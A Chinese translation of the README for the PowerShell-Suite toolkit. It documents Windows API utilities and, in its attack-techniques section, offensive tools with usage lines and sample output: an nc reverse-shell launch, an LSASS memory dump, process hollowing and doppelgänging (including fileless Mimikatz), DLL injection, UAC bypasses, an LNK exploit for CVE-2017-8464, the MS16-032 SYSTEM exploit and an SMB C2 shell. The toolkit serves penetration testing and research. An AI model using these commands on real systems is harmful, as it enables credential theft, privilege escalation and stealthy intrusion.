FuzzySecurity/PowerShell-Suite

# PowerShell 套件 网络上有很多出色的工具和资源可以完成 PowerShell 中的大部分任务，但有时，为了特定目的或弥补本体论上的差距，需要将一些工具脚本化组合起来。这是一个我出于兴趣或针对特定窄幅应用而创建的 PowerShell 工具集合。 因此，这些工具的实用价值可能因人而异，但欢迎发布问题报告或分叉改编！ ## Windows API 以下是一些关于从 PowerShell 访问 Windows API 的参考资料： * FuzzySecurity: [从 PowerShell 进行低级 Windows API 访问](http://www.fuzzysecurity.com/tutorials/24.html) * Microsoft TechNet: [使用 PowerShell 与 Windows API 交互](https://blogs.technet.microsoft.com/heyscriptingguy/2013/06/25/use-powershell-to-interact-with-the-windows-api-part-1/) * Exploit Monday: [通过内部 .NET 方法和反射在 PowerShell 中访问 Windows API](http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html) * Exploit Monday: [深度反射 - 在 PowerShell 中定义结构体和枚举](http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html) ### Invoke-Runas 功能上等同于 Windows 的 "runas.exe"，使用 Advapi32::CreateProcessWithLogonW。 ``` Start cmd with a local account. C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Binary C:\Windows\System32\cmd.exe -LogonType 0x1 Start cmd with remote credentials. Equivalent to "/netonly" in runas. C:\PS> Invoke-Runas -User SomeAccount -Password SomePass -Domain SomeDomain -Binary C:\Windows\System32\cmd.exe -LogonType 0x2 ``` ### Invoke-NetSessionEnum 使用 Netapi32::NetSessionEnum 枚举域加入机器上的活动会话。 ``` Enumerate active sessions on "SomeHostName". C:\PS> Invoke-NetSessionEnum -HostName SomeHostName ``` ### Invoke-CreateProcess 使用 Kernel32::CreateProcess 从 PowerShell 实现对进程创建的细粒度控制。 ``` Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1 Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1 ``` ### Detect-Debug 展示多种从 PowerShell 检测内核/用户模式调试器存在的技术。 ``` Sample below is x64 Win8, WinDbg attached to PowerShell. C:\PS> Detect-Debug [+] Detect Kernel-Mode Debugging [?] SystemKernelDebuggerInformation: False [+] Detect User-Mode Debugging [?] CloseHandle Exception: Detected [?] IsDebuggerPresent: Detected [?] CheckRemoteDebuggerPresent: Detected [?] PEB!BeingDebugged: Detected [?] PEB!NtGlobalFlag: Detected [?] DebugSelf: Detected ``` ### Get-Handles 使用 NtQuerySystemInformation::SystemHandleInformation 获取指定进程中已打开句柄的列表，适用于 x32/x64 系统。 ``` Get handles for PID 2288 C:\PS> Get-Handles -ProcID 2288 [>] PID 2288 --> notepad [+] Calling NtQuerySystemInformation::SystemHandleInformation [?] Success, allocated 449300 byte result buffer [>] Result buffer contains 28081 SystemHandleInformation objects [>] PID 2288 has 71 handle objects PID ObjectType HandleFlags Handle KernelPointer AccessMask --- ---------- ----------- ------ ------------- ---------- 2288 Directory NONE 0x0004 0x88E629F0 0x00000000 2288 File NONE 0x0008 0x84560C98 0x00100000 2288 File NONE 0x000C 0x846164F0 0x00100000 2288 Key NONE 0x0010 0xA3067A80 0x00020000 2288 ALPC Port NONE 0x0014 0x8480C810 0x001F0000 2288 Mutant NONE 0x0018 0x8591FEB8 0x001F0000 2288 Key NONE 0x001C 0x96719C48 0x00020000 2288 Event NONE 0x0020 0x850C6838 0x001F0000 ...Snip... ``` ### Get-TokenPrivs 打开进程句柄并使用 Advapi32::GetTokenInformation 列出与进程令牌关联的权限。 ``` Get token privileges for PID 3836 C:\PS> Get-TokenPrivs -ProcID 3836 [?] PID 3836 --> calc [+] Process handle: 1428 [+] Token handle: 1028 [+] Token has 5 privileges: LUID Privilege ---- --------- 19 SeShutdownPrivilege 23 SeChangeNotifyPrivilege 25 SeUndockPrivilege 33 SeIncreaseWorkingSetPrivilege 34 SeTimeZonePrivilege ``` ### Get-Exports Get-Exports 获取 DLL 导出项，并可选地提供 C++ 包装器输出（与 ExportsToC++ 相同，但无需 VS 和编译后的二进制文件）。为此，它将 DLL 字节读入内存然后进行解析（不使用 LoadLibraryEx）。因此，无论 PowerShell 的位数如何，您都可以解析 x32/x64 DLL。 ``` PS C:\> Get-Exports -DllPath C:\Windows\System32\ubpm.dll [?] 32-bit Image! [>] Time Stamp: 07/15/2016 18:07:55 [>] Function Count: 16 [>] Named Functions: 16 [>] Ordinal Base: 1 [>] Function Array RVA: 0x2F578 [>] Name Array RVA: 0x2F5B8 [>] Ordinal Array RVA: 0x2F5F8 Ordinal ImageRVA FunctionName ------- -------- ------------ 1 0x000242A0 UbpmAcquireJobBackgroundMode 2 0x00004750 UbpmApiBufferFree 3 0x00004E30 UbpmCloseTriggerConsumer 4 0x000135E0 UbpmInitialize 5 0x00008D00 UbpmOpenTriggerConsumer 6 0x000242C0 UbpmReleaseJobBackgroundMode 7 0x00013230 UbpmSessionStateChanged 8 0x000242E0 UbpmTerminate 9 0x00003BD0 UbpmTriggerConsumerConfigure 10 0x000040C0 UbpmTriggerConsumerControl 11 0x00025B10 UbpmTriggerConsumerControlNotifications 12 0x00025B40 UbpmTriggerConsumerQueryStatus 13 0x0000E1B0 UbpmTriggerConsumerRegister 14 0x000043F0 UbpmTriggerConsumerSetDisabledForUser 15 0x00012480 UbpmTriggerConsumerSetStatePublishingSecurity 16 0x00005330 UbpmTriggerConsumerUnregister ``` ### Get-SystemModuleInformation 使用 NtQuerySystemInformation::SystemModuleInformation 获取已加载模块的列表、它们的基地址和大小（x32/x64）。 ``` PS C:\> Get-SystemModuleInformation [+] Calling NtQuerySystemInformation::SystemModuleInformation [?] Success, allocated 55656 byte result buffer [?] Result buffer contains 188 SystemModuleInformation objects ImageBase ImageSize ImageName --------- --------- --------- 0xFFFFF80314C0D000 0x749000 \SystemRoot\system32\ntoskrnl.exe 0xFFFFF80315356000 0x6C000 \SystemRoot\system32\hal.dll 0xFFFFF803149ED000 0x9000 \SystemRoot\system32\kd.dll 0xFFFFF88000CB5000 0x5C000 \SystemRoot\System32\drivers\CLFS.SYS 0xFFFFF88000D11000 0x23000 \SystemRoot\System32\drivers\tm.sys 0xFFFFF88000D34000 0x15000 \SystemRoot\system32\PSHED.dll 0xFFFFF88000D49000 0xA000 \SystemRoot\system32\BOOTVID.dll 0xFFFFF88000D53000 0x7F000 \SystemRoot\system32\CI.dll 0xFFFFF88001068000 0x63000 \SystemRoot\System32\drivers\msrpc.sys 0xFFFFF880010CB000 0xC2000 \SystemRoot\system32\drivers\Wdf01000.sys 0xFFFFF8800118D000 0x10000 \SystemRoot\system32\drivers\WDFLDR.SYS ...Snip... ``` ### Expose-NetAPI 一个粗略的工具，通过反射将 .NET API 类暴露给 PowerShell。这包括内部私有类，例如 Microsoft.Win32.UnsafeNativeMethods。 ``` # Not all namespaces are available by default in # PowerShell, MSDN/Google is your friend! C:\PS> Expose-NetAPI -Search bitmap [!] Search returned no results, try specifying the namespace! C:\PS> Expose-NetAPI -Search bitmap -Namespace System.Drawing Assembly TypeName Name Definition -------- -------- ---- ---------- System.Drawing.dll System.Windows.Forms.DpiHelper CreateResizedBitmap static System.Drawing.Bitmap Crea... System.Drawing.dll System.Windows.Forms.DpiHelper ScaleBitmapLogicalToDevice static void ScaleBitmapLogicalToD... System.Drawing.dll System.Drawing.Bitmap FromHbitmap static System.Drawing.Bitmap From... System.Drawing.dll System.Drawing.BitmapSelector CreateBitmap static System.Drawing.Bitmap Crea... System.Drawing.dll System.Drawing.Image FromHbitmap static System.Drawing.Bitmap From... System.Drawing.dll System.Drawing.SafeNativeMethods CreateBitmap static System.IntPtr CreateBitmap... System.Drawing.dll System.Drawing.SafeNativeMethods CreateCompatibleBitmap static System.IntPtr CreateCompat... System.Drawing.dll System.Drawing.SafeNativeMethods IntCreateBitmap static System.IntPtr IntCreateBit... System.Drawing.dll System.Drawing.SafeNativeMethods IntCreateCompatibleBitmap static System.IntPtr IntCreateCom... System.Drawing.dll System.Drawing.Imaging.Metafile FromHbitmap static System.Drawing.Bitmap From... # Often multiple options available with differing # definitions. Take care when selecting the desired # API. C:\PS> Expose-NetAPI -Search drawbutton |Select Assembly,TypeName,Name |ft Assembly TypeName Name -------- -------- ---- System.Windows.Forms.dll System.Windows.Forms.ButtonRenderer DrawButton System.Windows.Forms.dll System.Windows.Forms.ControlPaint DrawButton System.Windows.Forms.dll System.Windows.Forms.DataGridViewButtonCell+Da... DrawButton # Take care when directly calling enable, a number # of assemblies are not loaded by default! C:\PS> Expose-NetAPI -Enable -Assembly System.Windows.Forms.dll -TypeName System.Windows.Forms.SafeNativeMethods [!] Unable to locate specified assembly! C:\PS> Expose-NetAPI -Load System.Windows.Forms True C:\PS> Expose-NetAPI -Enable -Assembly System.Windows.Forms.dll -TypeName System.Windows.Forms.SafeNativeMethods [+] Created $SystemWindowsFormsSafeNativeMethods! # Once enabled the TypeName is exposed as a global # variable and can be used to call any API's it includes! C:\PS> Expose-NetAPI -Enable -Assembly System.dll -TypeName Microsoft.Win32.UnsafeNativeMethods |Out-Null C:\PS> Expose-NetAPI -Enable -Assembly System.dll -TypeName Microsoft.Win32.SafeNativeMethods |Out-Null C:\PS> $ModHandle = $MicrosoftWin32UnsafeNativeMethods::GetModuleHandle("kernel32.dll") C:\PS> $Kernel32Ref = New-Object System.Runtime.InteropServices.HandleRef([IntPtr]::Zero,$ModHandle) C:\PS> $Beep = $MicrosoftWin32UnsafeNativeMethods::GetProcAddress($Kernel32Ref, "Beep") C:\PS> $MicrosoftWin32SafeNativeMethods::MessageBox([IntPtr]::Zero,$("{0:X}" -f [int64]$Beep),"Beep",0) ``` ### Get-ProcessMiniDump 使用 Dbghelp::MiniDumpWriteDump 创建进程转储。 ``` # Elevated user dumping elevated process C:\PS> (Get-Process lsass).Id 528 C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 528 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose VERBOSE: [?] Running as: Administrator VERBOSE: [?] Administrator privileges required VERBOSE: [>] Administrator privileges held VERBOSE: [>] Process dump success! C:\PS> $CallResult True # low priv user dumping low priv process C:\PS> (Get-Process calc).Id 2424 C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 2424 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose VERBOSE: [?] Running as: asenath.waite VERBOSE: [>] Process dump success! C:\PS> $CallResult True # low priv user dumping elevated process C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 4 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose VERBOSE: [?] Running as: asenath.waite VERBOSE: [?] Administrator privileges required VERBOSE: [!] Administrator privileges not held! C:\PS> $CallResult False ``` ### Get-SystemProcessInformation 使用 NtQuerySystemInformation::SystemProcessInformation 获取详细的进程列表和进程属性。仔细检查后，您会发现许多进程监视器（如 Sysinternals Process Explorer 或 Process Hacker）使用此信息类（以及 SystemPerformanceInformation、SystemProcessorPerformanceInformation 和 SystemProcessorCycleTimeInformation）。 ``` # Return full process listing C:\PS> Get-SystemProcessInformation # Return only specific PID C:\PS> Get-SystemProcessInformation -ProcID 1336 PID : 1336 InheritedFromPID : 1020 ImageName : svchost.exe Priority : 8 CreateTime : 0d:9h:8m:47s UserCPU : 0d:0h:0m:0s KernelCPU : 0d:0h:0m:0s ThreadCount : 12 HandleCount : 387 PageFaults : 7655 SessionId : 0 PageDirectoryBase : 3821568 PeakVirtualSize : 2097249.796875 MB VirtualSize : 2097240.796875 MB PeakWorkingSetSize : 11.65625 MB WorkingSetSize : 6.2109375 MB QuotaPeakPagedPoolUsage : 0.175910949707031 MB QuotaPagedPoolUsage : 0.167121887207031 MB QuotaPeakNonPagedPoolUsage : 0.0151519775390625 MB QuotaNonPagedPoolUsage : 0.0137710571289063 MB PagefileUsage : 3.64453125 MB PeakPagefileUsage : 4.14453125 MB PrivatePageCount : 3.64453125 MB ReadOperationCount : 0 WriteOperationCount : 0 OtherOperationCount : 223 ReadTransferCount : 0 WriteTransferCount : 0 OtherTransferCount : 25010 # Possibly returns multiple processes # eg: notepad.exe & notepad++.exe C:\PS> Get-SystemProcessInformation -ProcName note ``` ### Get-OSTokenInformation Get-OSTokenInformation 使用多种 API 获取所有（可访问的）用户令牌并查询其详细信息。 ``` # Return full token listing C:\PS> $OsTokens = Get-OSTokenInformation C:\PS> $OsTokens.Count 136 C:\PS> $OsTokens[10] PassMustChange : N/A ProcessCompany : Microsoft Corporation AuthPackage : NTLM TokenType : TokenPrimary PID : 5876 LastSuccessfulLogon : N/A Session : 1 LastFailedLogon : N/A ProcessPath : C:\Windows\system32\backgroundTaskHost.exe LogonServer : MSEDGEWIN10 Sid : S-1-5-21-4233833229-2203495600-2027003190-1000 ProcessAuthenticode : Valid User : MSEDGEWIN10\IEUser LoginTime : 4/16/2018 9:52:20 PM TokenPrivilegeCount : 5 TokenPrivileges : {SeShutdownPrivilege, SeChangeNotifyPrivilege, SeUndockPrivilege, SeIncreaseWorkingSetPrivilege...} Process : backgroundTaskHost PassLastSet : 10/17/2017 6:13:19 PM ImpersonationType : N/A TID : Primary TokenGroups : {MSEDGEWIN10\IEUser, MSEDGEWIN10\None, Everyone, NT AUTHORITY\Local account and member of Administrators group...} LogonType : Interactive GroupCount : 14 Elevated : No # Return brief token listing C:\PS> Get-OSTokenInformation -Brief Process PID TID Elevated ImpersonationType User ------- --- --- -------- ----------------- ---- ApplicationFrameHost 5820 Primary No N/A MSEDGEWIN10\IEUser backgroundTaskHost 1076 Primary No N/A MSEDGEWIN10\IEUser backgroundTaskHost 1960 Primary No N/A MSEDGEWIN10\IEUser backgroundTaskHost 7860 Primary No N/A MSEDGEWIN10\IEUser CompatTelRunner 680 Primary Yes N/A NT AUTHORITY\SYSTEM CompatTelRunner 6916 Primary Yes N/A NT AUTHORITY\SYSTEM CompatTelRunner 8488 Primary Yes N/A NT AUTHORITY\SYSTEM svchost 3572 Primary Yes N/A NT AUTHORITY\SYSTEM svchost 3900 Primary Yes N/A NT AUTHORITY\SYSTEM svchost 4292 Primary Yes N/A NT AUTHORITY\SYSTEM svchost 4292 144 No SecurityImpersonation MSEDGEWIN10\IEUser svchost 4292 7704 No SecurityImpersonation MSEDGEWIN10\IEUser svchost 4292 1404 No SecurityImpersonation MSEDGEWIN10\IEUser svchost 4464 Primary No N/A MSEDGEWIN10\IEUser svchost 4556 Primary No N/A MSEDGEWIN10\IEUser [... Snip ...] ``` ### Native-HardLink 这是一个 NT 硬链接的概念验证。从攻击角度来看，使用 NtSetInformationFile 创建硬链接（相对于 mklink/CreateHardLink）有一些优势。NtSetInformationFile 允许我们链接到我们没有写入权限的文件。 ``` PS C:\> Native-HardLink -Link C:\Some\Path\Hard.Link -Target C:\Some\Path\Target.file True ``` ## 攻击技术 ### Start-Hollow 这是一个进程镂空（process hollowing）的概念验证。这里没有什么新内容，除了可能使用了 NtCreateProcessEx，它有一些优势，即提供了一种方便的方法来设置父进程，并避免了麻烦的 Get/SetThreadContext。另一方面，CreateRemoteThreadEx/NtCreateThreadEx 是非常可疑的 API。 ``` # Create a Hollow from a PE on disk with explorer as the parent. # x64 Win10 RS4 C:\PS> Start-Hollow -Sponsor C:\Windows\System32\notepad.exe -Hollow C:\Some\PE.exe -ParentPID 8304 -Verbose VERBOSE: [?] A place where souls may mend your ailing mind.. VERBOSE: [+] Opened file for access VERBOSE: [+] Created section from file handle VERBOSE: [+] Opened handle to the parent => explorer VERBOSE: [+] Created process from section VERBOSE: [+] Acquired PBI VERBOSE: [+] Sponsor architecture is x64 VERBOSE: [+] Sponsor ImageBaseAddress => 7FF69E9F0000 VERBOSE: [+] Allocated space for the Hollow process VERBOSE: [+] Duplicated Hollow PE headers to the Sponsor VERBOSE: [+] Duplicated .text section to the Sponsor VERBOSE: [+] Duplicated .rdata section to the Sponsor VERBOSE: [+] Duplicated .data section to the Sponsor VERBOSE: [+] Duplicated .pdata section to the Sponsor VERBOSE: [+] Duplicated .rsrc section to the Sponsor VERBOSE: [+] Duplicated .reloc section to the Sponsor VERBOSE: [+] New process ImageBaseAddress => 40000000 VERBOSE: [+] Created Hollow process parameters VERBOSE: [+] Allocated memory in the Hollow VERBOSE: [+] Process parameters duplicated into the Hollow VERBOSE: [+] Rewrote Hollow->PEB->pProcessParameters VERBOSE: [+] Created Hollow main thread.. True ``` ### Start-Eidolon 这是一个进程分身（doppelgänging）的概念验证，由 enSilo 在 BlackHat EU 上最新提出。简单来说，此过程涉及从磁盘上的文件（任何文件都可以）创建一个 NTFS 事务。接下来，我们在内存中覆盖该文件，从修改后的文件创建一个 section，并基于该 section 启动一个进程。之后我们回滚事务，原始文件保持不变，但我们最终得到一个似乎由原始文件支持的进程。有关更完整的描述，请查看脚本中的参考文献。 ``` # Create a doppelgänger from a file on disk with explorer as the parent. # x64 Win10 RS3 C:\PS> Start-Eidolon -Target C:\Some\File.Path -Eidolon C:\Some\Other\File.Path -ParentPID 12784 -Verbose VERBOSE: [+] Created transaction object VERBOSE: [+] Created transacted file VERBOSE: [+] Overwriting transacted file VERBOSE: [+] Created section from transacted file VERBOSE: [+] Rolled back transaction changes VERBOSE: [+] Opened handle to the parent => explorer VERBOSE: [+] Created process from section VERBOSE: [+] Acquired Eidolon PBI VERBOSE: [+] Eidolon architecture is 64-bit VERBOSE: [+] Eidolon image base: 0x7FF6A0570000 VERBOSE: [+] Eidolon entry point: 0x7FF6A05E40C8 VERBOSE: [+] Created Eidolon process parameters VERBOSE: [+] Allocated memory in Eidolon VERBOSE: [+] Process parameters duplicated into Eidolon VERBOSE: [+] Rewrote Eidolon->PEB->pProcessParameters VERBOSE: [+] Created Eidolon main thread.. True # Create a fileless Mimikatz doppelgänger with PowerShell as the parent. # x32 Win7 C:\PS> Start-Eidolon -Target C:\Some\File.Path -Mimikatz -Verbose VERBOSE: [+] Created transaction object VERBOSE: [+] Created transacted file VERBOSE: [+] Overwriting transacted file VERBOSE: [+] Created section from transacted file VERBOSE: [+] Rolled back transaction changes VERBOSE: [+] Created process from section VERBOSE: [+] Acquired Eidolon PBI VERBOSE: [+] Eidolon architecture is 32-bit VERBOSE: [+] Eidolon image base: 0x400000 VERBOSE: [+] Eidolon entry point: 0x4572D2 VERBOSE: [+] Created Eidolon process parameters VERBOSE: [+] Allocated memory in Eidolon VERBOSE: [+] Process parameters duplicated into Eidolon VERBOSE: [+] Rewrote Eidolon->PEB->pProcessParameters VERBOSE: [+] Created Eidolon main thread.. True ``` ### Stage-RemoteDll Stage-RemoteDll 是一个用于演示各种 DLL 注入技术（NtCreateThreadEx / QueueUserAPC / SetThreadContext / SetWindowsHookEx）的小函数，适用于 32 位和 64 位架构。虽然我已进行了一些输入验证和清理，但这主要是概念验证代码。另请注意，这些技术可以很容易地被重新用于在远程进程中直接执行 shellcode。 ``` # Boolean return value C:\PS> $CallResult = Stage-RemoteDll -ProcID 1337 -DllPath .\Desktop\evil.dll -Mode NtCreateThreadEx C:\PS> $CallResult True # Verbose output C:\PS> Stage-RemoteDll -ProcID 1337 -DllPath .\Desktop\evil.dll -Mode QueueUserAPC -Verbose VERBOSE: [+] Using QueueUserAPC VERBOSE: [>] Opening notepad VERBOSE: [>] Allocating DLL path memory VERBOSE: [>] Writing DLL string VERBOSE: [>] Locating LoadLibraryA VERBOSE: [>] Getting process threads VERBOSE: [>] Registering APC's with all threads VERBOSE: --> Success, registered APC VERBOSE: --> Success, registered APC VERBOSE: --> Success, registered APC VERBOSE: --> Success, registered APC VERBOSE: [>] Cleaning up.. True ``` ### Export-LNKPwn 创建 LNK 文件以利用 CVE-2017-8464（又名 LNK 第三轮 ;))! 目前，建议您在本地创建 lnk 文件，然后将其移动到目标系统，因为存在 .Net 和 PowerShell 依赖项。更多详情请参阅函数概要。 ``` C:\PS> Export-LNKPwn -LNKOutPath C:\Some\Local\Path.lnk -TargetCPLPath C:\Target\CPL\Path.cpl -Type SpecialFolderDataBlock ``` ### UAC-TokenMagic 基于 James Forshaw 关于 UAC 的三部分博文（链接如下），可能也是 CIA 使用的一种技术！ 本质上，我们复制一个提权进程的令牌，降低其强制完整性级别，用它创建一个新的受限令牌，模拟它并使用 Secondary Logon 服务派生一个具有高完整性级别（High IL）的新进程。就像在玩令牌的捉迷藏游戏！;)) 只要您提供一个提权进程的 PID，此技术甚至可以绕过 "始终通知" 设置。 目标系统： 7,8,8.1,10,10RS1,10RS2 ``` C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -Args "/c calc.exe" -ProcPID 1116 [*] Session is not elevated [*] Successfully acquired regedit handle [*] Opened process token [*] Duplicated process token [*] Initialized MedIL SID [*] Lowered token mandatory IL [*] Created restricted token [*] Duplicated restricted token [*] Successfully impersonated security context [*] Magic.. ``` ### Bypass-UAC Bypass-UAC 提供了一个框架，用于基于自动提升的 IFileOperation COM 对象方法调用执行 UAC 绕过。这不是新技术，传统上，这是通过将 DLL 注入 "explorer.exe" 来实现的。这是不可取的，因为注入 explorer 可能会触发安全警报，并且使用非托管 DLL 会导致工作流程不灵活。 为了解决这个问题，Bypass-UAC 实现了一个重写 PowerShell 的 PEB 的函数，使其显示为 "explorer.exe"。这提供了相同的效果，因为 COM 对象完全依赖于 Windows 的进程状态 API（PSAPI），该 API 读取进程 PEB。 ``` C:\PS> Bypass-UAC -Method ucmDismMethod [!] Impersonating explorer.exe! [+] PebBaseAddress: 0x000007F73E93F000 [!] RtlEnterCriticalSection --> &Peb->FastPebLock [>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x000000569B5F1780 [>] Overwriting &Peb->ProcessParameters.CommandLine: 0x000000569B5F1790 [?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list [>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x000000569B5F2208 [>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x000000569B5F2218 [!] RtlLeaveCriticalSection --> &Peb->FastPebLock [>] Dropping proxy dll.. [+] 64-bit Yamabiko: C:\Users\b33f\AppData\Local\Temp\yam1730961377.tmp [>] Creating XML trigger: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml [>] Performing elevated IFileOperation::MoveItem operation.. [?] Executing PkgMgr.. [!] UAC artifact: C:\Windows\System32\dismcore.dll [!] UAC artifact: C:\Users\b33f\AppData\Local\Temp\pac500602004.xml ``` ### Masquerade-PEB Masquerade-PEB 使用 NtQueryInformationProcess 获取 powershell 的 PEB 句柄。从那里，它替换内存中的多个 UNICODE_STRING 结构体，使 powershell 显示为不同的进程。具体来说，该函数将覆盖 _RTL_USER_PROCESS_PARAMETERS 中的 "ImagePathName" 和 "CommandLine"，以及 _LDR_DATA_TABLE_ENTRY 链表中的 "FullDllName" 和 "BaseDllName"。 这可能很有用，因为它会欺骗任何完全依赖进程状态 API 来检查进程身份的 Windows 工作流程。 ``` C:\PS> Masquerade-PEB -BinPath C:\Windows\System32\notepad.exe [?] PID 2756 [+] PebBaseAddress: 0x7FFD3000 [!] RtlEnterCriticalSection --> &Peb->FastPebLock [>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x002F11F8 [>] Overwriting &Peb->ProcessParameters.CommandLine: 0x002F1200 [?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list [>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x002F1B74 [>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x002F1B7C [!] RtlLeaveCriticalSection --> &Peb->FastPebLock ``` ### Invoke-SMBShell 使用命名管道（System.IO.Pipes）作为 C2 通道的概念验证 shell。SMB 流量使用 AES CBC 加密（代码来自 Empire），密钥/管道在启动时由服务器随机生成。 **服务器：** ``` PS C:\> Invoke-SMBShell +------- | Host Name: 0AK | Named Pipe: tapsrv.5604.yk0DxXvjUD9xwyJ9 | AES Key: q6EKfuJTX93YUnmX +------- [>] Waiting for client.. SMB shell: whoami 0ak\b33f SMB shell: IdontExist The term 'IdontExist' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. SMB shell: $PSVersionTable Name Value ---- ----- PSRemotingProtocolVersion 2.2 BuildVersion 6.2.9200.17065 PSCompatibleVersions {1.0, 2.0, 3.0} PSVersion 3.0 CLRVersion 4.0.30319.42000 WSManStackVersion 3.0 SerializationVersion 1.1.0.1 SMB shell: leave [!] Client disconnecting.. [>] Waiting for client.. SMB shell: calc Job SMBJob-dVkIkAkXINjMe09S completed successfully! SMB shell: exit [!] Client disconnecting.. [!] Terminating server.. PS C:\> ``` **客户端：** ``` # Client disconnected because of "leave" command PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9 # Client disconnected because "exit" command kills client/server PS C:\> Invoke-SMBShell -Client -Server 0AK -AESKey q6EKfuJTX93YUnmX -Pipe tapsrv.5604.yk0DxXvjUD9xwyJ9 ``` ### Conjure-LSASS 使用 SeDebugPrivilege 复制 LSASS 访问令牌并在调用线程中模拟它。如果 SeDebugPrivilege 被禁用，该函数将重新启用它。 ``` Conjure LSASS into our midst! ;) C:\PS> Conjure-LSASS [?] SeDebugPrivilege is available! [+] Current process handle: 852 [>] Calling Advapi32::OpenProcessToken [+] Token handle with TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY: 2000 [?] SeDebugPrivilege is enabled! [>] Calling Advapi32::OpenProcessToken --> LSASS [+] Token handle with TOKEN_IMPERSONATE|TOKEN_DUPLICATE: 1512 [>] Calling Advapi32::DuplicateToken --> LSASS [+] Duplicate token handle with SecurityImpersonation level: 2008 [>] Calling Advapi32::SetThreadToken [+] Knock knock .. who's there .. LSASS [+] User context: SYSTEM C:\PS> whoami ERROR: Access is denied. ERROR: Access is denied. C:\PS> Get-ChildItem -Path hklm:SAM Hive: HKEY_LOCAL_MACHINE\SAM SKC VC Name Property --- -- ---- -------- 3 2 SAM {C, ServerDomainUpdates} ``` ### Invoke-MS16-032 MS16-032 的 PowerShell 实现。该漏洞针对所有支持 PowerShell v2+ 的易受攻击操作系统。发现此漏洞及其利用逻辑的功劳归于 James Forshaw (@tiraniddo)。 目标系统： * Win7-Win10 & 2k8-2k12 <== 32/64 位！ * 已在 x32 Win7, x64 Win8, x64 2k12R2 上测试 ==> 尚未在安装了 PowerShell v1 的 Vista 上测试，如果您能够检查，请告诉我结果！ ``` Sit back and watch the pwn! C:\PS> Invoke-MS16-032 __ __ ___ ___ ___ ___ ___ ___ | V | _|_ | | _|___| |_ |_ | | |_ |_| |_| . |___| | |_ | _| |_|_|_|___|_____|___| |___|___|___| [by b33f -> @FuzzySec] [?] Operating system core count: 2 [>] Duplicating CreateProcessWithLogonW handle [?] Done, using thread handle: 956 [*] Sniffing out privileged impersonation token.. [?] Thread belongs to: svchost [+] Thread suspended [>] Wiping current impersonation token [>] Building SYSTEM impersonation token [?] Success, open SYSTEM token handle: 964 [+] Resuming thread.. [*] Sniffing out SYSTEM shell.. [>] Duplicating SYSTEM token [>] Starting token race [>] Starting process race [!] Holy handle leak Batman, we have a SYSTEM shell!! ``` ### Subvert-PE 将 shellcode 注入 PE 映像，同时保留 PE 功能。 更多信息，请参考： * FuzzySecurity: [PowerShell PE 注入，这不是你要找的计算器！](http://www.fuzzysecurity.com/tutorials/20.html) ``` Analyse the PE header and hexdump the region of memory where shellcode would be injected. C:\PS> Subvert-PE -Path C:\Path\To\PE.exe Same as above but continue to inject shellcode and overwrite the binary. C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write ``` ## 工具 ### Get-LimitChildItem 带有基本过滤功能的深度限制版 Get-ChildItem 包装器。 ``` # UNC path txt file search PS C:\> Get-LimitChildItem -Path "\\192.168.84.129\C$\Program Files\" -MaxDepth 5 -Filter "*.txt" \\192.168.84.129\C$\Program Files\Windows Defender\ThirdPartyNotices.txt \\192.168.84.129\C$\Program Files\VMware\VMware Tools\open_source_licenses.txt \\192.168.84.129\C$\Program Files\VMware\VMware Tools\vmacthlp.txt \\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceAmharic.txt \\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceArray.txt \\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceDaYi.txt \\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceTigrinya.txt \\192.168.84.129\C$\Program Files\Windows NT\TableTextService\TableTextServiceYi.txt # Local wildcard *ini* search PS C:\> Get-LimitChildItem -Path C:\ -MaxDepth 3 -Filter "*ini*" C:\Windows\system.ini C:\Windows\win.ini C:\Windows\Boot\BootDebuggerFiles.ini C:\Windows\Fonts\desktop.ini C:\Windows\INF\mdmminij.inf C:\Windows\Media\Windows Minimize.wav C:\Windows\PolicyDefinitions\PenTraining.admx C:\Windows\PolicyDefinitions\WinInit.admx C:\Windows\System32\dwminit.dll C:\Windows\System32\ie4uinit.exe C:\Windows\System32\ieuinit.inf C:\Windows\System32\PerfStringBackup.INI C:\Windows\System32\rdpinit.exe C:\Windows\System32\regini.exe C:\Windows\System32\secinit.exe C:\Windows\System32\tcpmon.ini C:\Windows\System32\TpmInit.exe C:\Windows\System32\userinit.exe C:\Windows\System32\userinitext.dll C:\Windows\System32\UXInit.dll C:\Windows\System32\WimBootCompress.ini C:\Windows\System32\wininet.dll C:\Windows\System32\wininetlui.dll C:\Windows\System32\wininit.exe C:\Windows\System32\wininitext.dll 